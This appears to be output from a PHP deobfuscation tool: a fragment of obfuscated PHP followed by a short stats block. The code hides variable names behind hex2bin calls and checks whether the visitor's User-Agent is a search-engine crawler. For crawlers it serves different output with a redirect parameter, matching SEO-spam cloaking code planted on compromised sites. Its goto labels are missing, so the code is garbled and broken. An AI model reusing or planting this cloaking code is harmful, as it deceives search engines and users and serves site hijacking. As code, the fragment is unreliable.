: goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? 
$_SERVER["QUERY_STRING"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("413939"); })}, 1) : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : switch (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=0&{${call_user_func(function () { return hex2bin("433139"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : } ?>
Function Calls
None |
Stats
MD5 | 5e5ab1d4ed1acf39399af04a0d1c7536 |
Eval Count | 0 |
Decode Time | 51 ms |